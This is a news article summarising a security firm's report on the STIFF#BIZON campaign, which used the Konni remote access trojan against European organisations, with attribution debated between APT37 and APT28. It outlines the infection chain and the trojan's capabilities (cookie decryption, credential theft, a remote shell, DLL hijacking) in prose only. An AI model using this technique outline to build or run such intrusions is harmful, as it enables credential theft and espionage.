Hackers from North Korea use Konni RAT malware to attack targets in the EU

Threat researchers have discovered a fresh campaign that is being carried out by the North Korean hacking group APT37 and is aimed at high-value organizations in the Czech Republic, Poland, and other nations in Europe.

A remote access trojan (RAT) known as Konni, which can establish persistence and perform host privilege escalation, is the malware the hackers are using in this campaign.

Since 2014, North Korean cyberattacks have been linked to Konni, and most recently, it was used in a spear-phishing attempt against the Russian Ministry of Foreign Affairs.

Researchers at Securonix have been tracking and analyzing the most recent, still-active campaign, which they have dubbed STIFF#BIZON. It mirrors APT (advanced persistent threat) operational sophistication-matched tactics and methodologies .

The STIFF#BIZON campaign

An email phishing scam with a Word document (missile.docx) and a Windows shortcut file (_weapons.doc.lnk.lnk) archive attachment is what starts the attack.

When the LNK file is accessed, code searches for a base64-encoded PowerShell script in the DOCX file to start a C2 connection and download the two extra files weapons.doc and wp.vbs.

The downloaded file is a ruse that seems to be a report from Russian combat correspondent Olga Bozheva. A scheduled job is created on the host at the same time the VBS file is silently running in the background.

Since the attacker has already loaded the RAT and created a data exchange link at this point in the attack, they are able to carry out the following operations:

Use the Win32 GDI API to take screenshots, then export them in GZIP format.

Extract state keys from the Local State file to decrypt cookie databases, which is useful for getting around MFA.

Get the victim’s saved login information from their web browsers.

Start a remote interactive shell with 10 second command execution intervals.

The fourth stage of the assault, as depicted in the diagram below, involves the hackers downloading extra files that help the modified Konni sample function. They do this by retrieving them as compressed “.cab” archives.

These include DLLs that swap out trustworthy Windows service libraries, such as the “wpcsvc” in System32, which is used to run commands with greater user rights within the OS.

Possible links to APT28

Securonix emphasizes the likelihood that APT28 (also known as FancyBear), rather than APT37, is behind the STIFF#BIZON campaign even though the methods and toolkit point to APT37.

According to the report’s conclusion, “There appears to be a direct correlation between IP addresses, hosting provider, and hostnames between this attack and historical data we have previously seen from FancyBear/APT28.”

The likelihood of misattribution in this instance is high since state-sponsored threat groups sometimes try to imitate the TTPs of other expert APTs to hide their tracks and trick threat analysts.

Readers like you help support The Tech Outlook. When you make a purchase using links on our site, we may earn an affiliate commission. We cannot guarantee the Product information shown is 100% accurate and we advise you to check the product listing on the original manufacturer website. Thetechoutlook is not responsible for price changes carried out by retailers. The discounted price or deal mentioned in this item was available at the time of writing and may be subject to time restrictions and/or limited unit availability. Amazon and the Amazon logo are trademarks of Amazon.com, Inc. or its affiliates Read More

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

function init() { var vidDefer = document.getElementsByTagName('iframe'); for (var i=0; i